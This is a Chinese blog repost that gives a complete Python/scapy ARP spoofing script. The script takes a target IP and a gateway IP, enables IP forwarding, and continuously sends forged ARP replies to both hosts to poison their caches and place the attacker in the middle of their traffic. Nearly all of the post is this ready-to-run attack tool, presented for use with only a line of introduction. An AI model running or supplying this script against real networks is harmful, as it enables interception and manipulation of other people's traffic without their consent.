python arp欺骗
生活随笔
收集整理的這篇文章主要介紹了
python arp欺骗
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
使用python構(gòu)造一個(gè)arp欺騙腳本
import os import sys from scapy.all import * import optparse def main():usage="usage:[-i interface] [-t IP to attack] [-g Gateway IP]"parser=optparse.OptionParser(usage)parser.add_option('-i',dest='interface',help='select interface(input eth0 or wlan0 or more)')parser.add_option('-t',dest='IP',help='You want to attack the IP')parser.add_option('-g',dest='gatewayip',help='The IP of the gateway')(options,args)=parser.parse_args()if options.interface and options.IP and options.gatewayip:interface=options.interfaceIP=options.IPgatewayip=options.gatewayipspoof(interface,IP,gatewayip)else:parser.print_help()sys.exit() def spoof(interface,IP,gatewayip):benjimac=get_if_hwaddr(interface)mubiao=getmacbyip(IP)wanguan=getmacbyip(gatewayip)ptarget = Ether(src=benjimac, dst=mubiao) / ARP(hwsrc=benjimac, psrc=gatewayip, hwdst=mubiao, pdst=IP, op=2) #本地-》網(wǎng)關(guān) pgateway=Ether(src=benjimac,dst=wanguan)/ARP(hwsrc=benjimac,psrc=IP,hwdst=wanguan,pdst=gatewayip,op=2) #本地-》目標(biāo)機(jī)print '[+]Open IP forwarding'zhuanfa=os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') #IP轉(zhuǎn)發(fā) try:while 1:sendp(ptarget, inter=2, iface=interface) #發(fā)包print "send arp reponse to target(%s),gateway(%s) macaddress is %s" % (gatewayip, gatewayip, benjimac)sendp(pgateway, inter=2, iface=interface) #發(fā)包print "send arp reponse to gateway(%s),target(%s) macaddress is %s" % (IP, IP, benjimac)except Exception as f:print '[-]Error:',fsys.exit() if __name__ == '__main__':main()測(cè)試圖:
?
轉(zhuǎn)載于:https://www.cnblogs.com/haq5201314/p/8449101.html
總結(jié)
以上是生活随笔為你收集整理的python arp欺骗的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 剑指Offer名企面试官精讲典型编程题p
- 下一篇: 【BZOJ2095】【POI2010】B